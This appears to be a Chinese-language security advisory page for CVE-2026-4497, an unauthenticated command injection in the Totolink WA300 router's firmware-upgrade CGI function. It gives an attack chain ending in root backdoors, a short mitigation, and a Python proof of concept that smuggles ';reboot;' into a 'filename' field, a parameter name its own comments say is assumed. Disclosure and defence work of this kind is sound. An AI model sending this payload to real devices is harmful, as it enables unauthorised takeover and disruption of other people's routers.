CVE-2026-4497 CVSS 7.3 高危

CVE-2026-4497 Totolink WA300 OS命令注入漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4497

漏洞类型

OS命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink WA300

漏洞概述

Totolink WA300 5.2cu.7112_B20190227 版本的 Web 接口 /cgi-bin/cstecgi.cgi 组件中 recvUpgradeNewFw 函数存在严重的操作系统命令注入漏洞。由于该函数未能正确过滤用户提供的输入数据，攻击者无需任何身份认证即可构造恶意 HTTP 数据包。利用此漏洞，攻击者可在目标系统上远程执行任意操作系统命令，导致机密性、完整性和可用性受损。目前该漏洞利用代码及细节已公开，对未打补丁的设备构成极高安全风险。

技术细节

该漏洞具体存在于 Totolink WA300 路由器固件版本的 Web 管理接口中。受损的文件 `/cgi-bin/cstecgi.cgi` 包含一个名为 `recvUpgradeNewFw` 的函数，该函数设计用于处理固件升级及相关的文件接收操作。在实现过程中，开发人员未对传入的参数（例如文件名或路径参数）进行严格的边界检查和安全过滤，直接将其传递给了底层的系统调用函数（如 `system()`）。攻击者可以利用这一疏忽，通过发送特制的 POST 请求，在参数中插入 Shell 元字符（如 `;`、`|` 或 `` ` ``），从而拼接并执行任意的操作系统命令。考虑到该 CGI 接口无需用户登录即可访问（PR:N），且通常以 root 权限运行，攻击者一旦利用成功，便能完全接管设备。

攻击链分析

STEP 1

步骤1：侦察

攻击者扫描网络，识别出运行 Totolink WA300 5.2cu.7112_B20190227 固件版本的目标设备。

STEP 2

步骤2：漏洞利用

攻击者向目标设备的 /cgi-bin/cstecgi.cgi 端点发送特制的 HTTP POST 请求，该请求针对 recvUpgradeNewFw 函数，并在参数中注入恶意的 Shell 命令。

STEP 3

步骤3：命令执行

由于后端未对输入进行过滤，恶意参数被传递给系统 Shell 执行，攻击者成功在设备上运行任意命令（如下载后门、修改密码）。

STEP 4

步骤4：持久化控制

攻击者利用获取的 Root 权限建立后门，长期控制该路由器，并可能以此为跳板攻击内网其他设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Vulnerable Target URL
target_url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi"

# Vulnerability Payload: Injecting a command to ping a controlled server (or simple reboot)
# The payload targets the 'recvUpgradeNewFw' function
# Assuming the parameter name is 'filename' or similar based on common firmware upgrade logic
data = {
    "function": "recvUpgradeNewFw",
    "filename": "test.bin;reboot;"
}

headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0 (compatible; PoC/1.0)"
}

try:
    response = requests.post(target_url, json=data, headers=headers, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if device rebooted.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Totolink WA300 5.2cu.7112_B20190227

防御指南

临时缓解措施

如果无法立即升级固件，建议在防火墙或边界网关上阻断对设备 80/443 端口（特别是 /cgi-bin/ 路径）的外部访问，仅允许可信的内网管理IP进行连接，以降低被远程攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表